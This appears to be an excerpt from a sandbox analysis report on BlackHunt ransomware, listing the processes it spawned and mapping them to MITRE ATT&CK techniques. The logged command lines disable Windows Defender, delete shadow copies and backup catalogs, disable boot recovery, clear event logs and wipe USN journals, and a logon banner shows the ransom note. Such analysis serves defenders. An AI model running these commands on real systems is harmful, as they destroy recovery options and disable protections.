- C:\Windows\system32\reg.exe (PID 1300): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
- C:\Windows\System32\vds.exe (PID 11340): C:\Windows\System32\vds.exe
- C:\Windows\system32\reg.exe (PID 1780): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
- C:\Windows\system32\reg.exe (PID 5076): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
- C:\Windows\system32\reg.exe (PID 2740): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 2176): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
- C:\Windows\System32\Conhost.exe (PID 2008): \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- C:\Windows\system32\reg.exe (PID 2320; signatures: Modifies registry class): reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
- C:\Windows\system32\wevtutil.exe (PID 7684; signatures: Clears Windows event logs): wevtutil.exe cl System
- C:\Windows\System32\Conhost.exe (PID 5068): \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- C:\Windows\system32\schtasks.exe (PID 7212): SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
- C:\Windows\SysWOW64\PING.EXE (PID 6776; signatures: Runs ping.exe): ping 127.0.0.1 -n 5
- C:\Windows\system32\reg.exe (PID 6716): REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
- C:\Windows\system32\reg.exe (PID 6788): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
- C:\Windows\system32\reg.exe (PID 5848): REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
- C:\Windows\system32\reg.exe (PID 5856): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
- C:\Windows\system32\schtasks.exe (PID 6832): schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
- C:\Windows\system32\taskkill.exe (PID 7064; signatures: Kills process with taskkill): taskkill /IM mshta.exe /f
- C:\Windows\system32\wbadmin.exe (PID 6428; signatures: Deletes backup catalog): wbadmin.exe delete catalog -quiet
- C:\Windows\system32\bcdedit.exe (PID 3484; signatures: Modifies boot configuration data using bcdedit): bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
- C:\Windows\system32\vssadmin.exe (PID 8348; signatures: Interacts with shadow copies): vssadmin.exe Delete Shadows /all /quiet
- C:\Windows\system32\bcdedit.exe (PID 5812; signatures: Modifies boot configuration data using bcdedit): bcdedit /set {default} recoveryenabled No
- C:\Windows\system32\wevtutil.exe (PID 7552; signatures: Clears Windows event logs): wevtutil.exe cl Application
- C:\Windows\system32\wevtutil.exe (PID 8012; signatures: Clears Windows event logs): wevtutil.exe cl Setup
- C:\Windows\SysWOW64\WerFault.exe (PID 7148): C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 12964 -ip 12964
- C:\Windows\system32\fsutil.exe (PID 8716): fsutil usn deletejournal /D M:\
- C:\Windows\system32\fsutil.exe (PID 14456): fsutil usn deletejournal /D C:\
- C:\Windows\system32\fsutil.exe (PID 13760): fsutil usn deletejournal /D F:\
- C:\Windows\system32\BackgroundTransferHost.exe (PID 1560; signatures: Enumerates connected drives): "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Network
MITRE ATT&CK Enterprise v15
- Persistence
  - Boot or Logon Autostart Execution (1)
    - Registry Run Keys / Startup Folder (1)
  - Create or Modify System Process (1)
    - Windows Service (1)
  - Scheduled Task/Job (1)
- Privilege Escalation
  - Abuse Elevation Control Mechanism (1)
    - Bypass User Account Control (1)
  - Boot or Logon Autostart Execution (1)
    - Registry Run Keys / Startup Folder (1)
  - Create or Modify System Process (1)
    - Windows Service (1)
  - Scheduled Task/Job (1)
- Defense Evasion
  - Abuse Elevation Control Mechanism (1)
    - Bypass User Account Control (1)
  - Impair Defenses (2)
    - Disable or Modify Tools (2)
  - Indicator Removal (4)
    - File Deletion (3)
  - Modify Registry (4)